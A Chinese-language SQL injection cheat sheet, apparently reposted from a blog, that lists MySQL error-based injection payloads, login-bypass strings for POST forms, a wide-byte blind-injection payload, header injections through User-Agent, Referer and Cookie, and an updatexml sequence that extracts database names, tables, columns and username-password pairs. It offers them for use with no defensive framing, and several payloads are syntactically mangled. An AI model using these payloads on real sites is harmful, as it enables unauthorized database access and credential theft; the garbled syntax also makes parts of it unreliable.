zoukankan      html  css  js  c++  java

  • 报错注入

    1、通过floor报错,注入语句如下:
    and select 1 from (select count(),concat(version(),floor(rand(0)2))x from information_schema.tables group by x)a);

    2、通过ExtractValue报错,注入语句如下:
    and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

    3、通过UpdateXml报错,注入语句如下:
    and 1=(updatexml(1,concat(0x3a,(select user())),1))

    4、通过NAME_CONST报错,注入语句如下:
    and exists(selectfrom (selectfrom(selectname_const(@@version,0))a join (select name_const(@@version,0))b)c)

    5、通过join报错,注入语句如下:
    select * from(select * from mysql.user ajoin mysql.user b)c;

    6、通过exp报错,注入语句如下:
    and exp(~(select * from (select user () ) a) );

    7、通过GeometryCollection()报错,注入语句如下:
    and GeometryCollection(()select *from(select user () )a)b );

    8、通过polygon ()报错,注入语句如下:
    and polygon (()select * from(select user ())a)b );

    9、通过multipoint ()报错,注入语句如下:
    and multipoint (()select * from(select user() )a)b );

    10、通过multlinestring ()报错,注入语句如下:
    and multlinestring (()select * from(selectuser () )a)b );

    11、通过multpolygon ()报错,注入语句如下:
    and multpolygon (()select * from(selectuser () )a)b );

    12、通过linestring ()报错,注入语句如下:
    and linestring (()select * from(select user() )a)b );

    关于POST注入

    常用的万能username语句:
    a ’ or 1=1 #
    a ") or 1=1 #
    a‘) or 1=1 #
    a” or “1”=”1
    ' or '1'='1
    ' or (length(database())) = 8 (用于输入’ “都没有错误)
    ' or (ascii(substr((select database()) ,1,1))) = 115 # (用于输入’ “都没有错误)
    ") or ("1")=("1
    ") or 1=1 or if(1=1, sleep(1), null) #
    ") or (length(database())) = 8 #
    ") or (ascii(substr((select database()) ,1,1))) = 115 or if(1=1, sleep(1), null) #

    post型盲注通杀payload:

    uname=admin%df'or()or%200%23&passwd=&submit=Submit

    关于UPDATEXML,REFERER,COOKIE的构造

    User-Agent:.........' or updatexml(1,concat(0x7e,database(),0x7e),1),”,”) #
    Referer: ’ or updatexml(1,concat(0x7e,database(),0x7e),1),”,”) #
    Cookie:username: admin ’ or updatexml(1,concat(0x7e,database(),0x7e),1) #

    updatexml报错注入

    爆数据库版本信息:?id=1 and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)
    链接用户:?id=1 and updatexml(1,concat(0x7e,(SELECT user()),0x7e),1)
    链接数据库:?id=1 and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)
    爆库:?id=1 and updatexml(1,concat(0x7e,(SELECT distinct concat(0x7e, (select schema_name),0x7e) FROM admin limit 0,1),0x7e),1)
    爆表:?id=1 and updatexml(1,concat(0x7e,(SELECT distinct concat(0x7e, (select table_name),0x7e) FROM admin limit 0,1),0x7e),1)
    爆字段:?id=1 and updatexml(1,concat(0x7e,(SELECT distinct concat(0x7e, (select column_name),0x7e) FROM admin limit 0,1),0x7e),1)
    爆字段内容:?id=1 and updatexml(1,concat(0x7e,(SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1),0x7e),1)




    链接:https://www.jianshu.com/p/bc35f8dd4f7c
  • 相关阅读:
    CDN是什么?
    CSS实现隐藏滚动条同时又可以滚动
    顶部固定 页面内容部分可以滚动
    H5对话框水平垂直居中
    移动端调试神器(eruda)
    JAVA_OA管理系统(三)番外篇:Myeclipse导入Spring源码包
    Spring Framework Reference Documentation手册官网下载地址
    Spring Framework Reference Documentation手册官网下载地址
    JAVA_OA(六):SpringMVC登陆实例
    JAVA_OA(五)(番外篇):SpringMVC乱码解决(post,get)
  • 原文地址:https://www.cnblogs.com/ihacker/p/11099647.html
Copyright © 2011-2022 走看看